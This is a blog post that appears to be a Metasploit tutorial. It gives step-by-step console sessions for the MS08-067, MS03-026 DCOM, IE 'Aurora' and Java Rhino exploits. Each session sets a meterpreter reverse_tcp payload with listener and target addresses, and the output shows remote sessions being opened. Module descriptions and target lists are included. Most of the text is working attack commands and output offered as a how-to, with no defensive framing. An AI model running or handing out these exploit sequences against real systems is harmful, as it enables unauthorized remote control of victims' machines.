![[Image: VZySS.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tmPEaBbjZcm8VZHmhqYMF3iaWHSYhou6WcTJUKPAYoWDGSJlI4U-DGZqfzYkk25doU9JucZKLUWXevtdcNDw=s0-d)
![[Image: JYUpu.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ujxjhFq7xZV3pCBh5MRuQZzEVPCZxcAnHExWWpDd9dyAbdUmULxsEofqHpmjmH6ISOqCyTWkNAJbwARZskbv0=s0-d)
Code:
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 14319
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm <hdm@metasploit.com>
Brett Moore <brett.moore@insomniasec.com>
staylor
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
2 Windows XP SP0/SP1 Universal
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
3 Windows XP SP2 English (AlwaysOn NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
4 Windows XP SP2 English (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
5 Windows XP SP3 English (AlwaysOn NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
6 Windows XP SP3 English (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
Basic options:
Name Current Setting Required Description
---- -- -- --
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 charactersExample:
Code:
II dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
II 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
=[ svn r14663 updated today (2012.01.31)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)![[Image: XlPRp.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sAS75qC4U0he1hToi5m5cTCZFi6olOLkLMFJwSMW55xEH9RvpndgrZPM8VJD0t07dsjhKyb1B7EWvAlJJ8WA=s0-d)
Code:
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf
exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set lport 4443
lport => 4443
msf exploit(ms03_026_dcom) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.2.103:4443
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Code:
msf > search aurora
Matching Modules
==
Name Disclosure Date Rank Description
---- -- ---- --
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal Internet Explorer "Aurora" Memory Corruption
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
smsf exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- -- -- --
SRVHOST 192.168.2.103 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -- -- --
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.2.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set uripath /
uripath => /
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012Info:
Code:
Name: Internet Explorer "Aurora" Memory Corruption
Module: exploit/windows/browser/ms10_002_aurora
Version: 14034
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
unknown
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- -- -- --
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1000
Avoid: 1 characters
Description:
This module exploits a memory corruption flaw in Internet Explorer.
This flaw was found in the wild and was a key component of the
"Operation Aurora" attacks that lead to the compromise of a number
of high profile companies. The exploit code is a direct port of the
public sample published to the Wepawet malware analysis site. The
technique used by this module is currently identical to the public
sample, as such, only Internet Explorer 6 can be reliably exploited.![[Image: pDKI0.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZMg1pVriD0SqFlEfKpoeXlRz0Yp3xSFOkAwkPb5BIztfe-jVkkW4UFTCVvTVSLRbW392UaAgACbmzNVLWOyo=s0-d)
Java Rhino Example:
Code:
II dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
II 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
=[ svn r14663 updated today (2012.01.31)
msf > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(java_rhino) > set lport 4444
lport => 4444
smsf exploit(java_rhino) > set uripath /
uripath => /
msf exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf exploit(java_rhino) > show options
Module options (exploit/multi/browser/java_rhino):
Name Current Setting Required Description
---- -- -- --
SRVHOST 192.168.2.103 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -- -- --
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.2.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf exploit(java_rhino) > set srvport 80
srvport => 80
msf exploit(java_rhino) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote
Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012Java Rhino More Info:
Code:
Name: Java Applet Rhino Script Engine Remote Code Execution
Module: exploit/multi/browser/java_rhino
Version: 0
Platform: Java, Windows, Linux
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
Michael Schierl
juan vazquez
Edward D. Teach <teach@consortium-of-pwners.net>
sinn3r <sinn3r@metasploit.com>
Available targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows Universal
2 Apple OSX
3 Linux x86
Basic options:
Name Current Setting Required Description
---- -- -- --
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 20480
Avoid: 0 characters
Description:
This module exploits a vulnerability in the Rhino Script Engine that
can be used by a Java Applet to run arbitrary Java code outside of
the sandbox. The vulnerability affects version 7 and version 6
update 27 and earlier, and should work on any browser that supports
Java (for example: IE, Firefox, Google Chrome, etc)
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-3544
http://www.osvdb.org/76500
http://www.zerodayinitiative.com/advisories/ZDI-11-305/
http://schierlm.users.sourceforge.net/CVE-2011-3544.htmlOkay so this needs settings similar to aurora. So let's chose java rhino:
Code:
use exploit/multi/browser/java_rhino
Code:
set payload windows/meterpreter/reverse_tcp
Code:
set lhost 192.168.2.103
set lport 4444
set srvhost 192.168.2.103![[Image: JjRp4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vONUEpgpafb1e9VmTBuFZfR4tXnpYUUH_Rn5GI_S9o3LVm-tjwyFuVc5Na7vllbL02vq2toAr_JFsLL7IRR_0=s0-d)
![[Image: 9OtxD.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v59FFB7zJgVuIHS8GHq7lsznAsGzHryec8SNNuYYtixULAH9AIlaeJu2VEka2qwg0g8yyY_NKwREcdBDVe3Kc=s0-d)
0 comments:
Post a Comment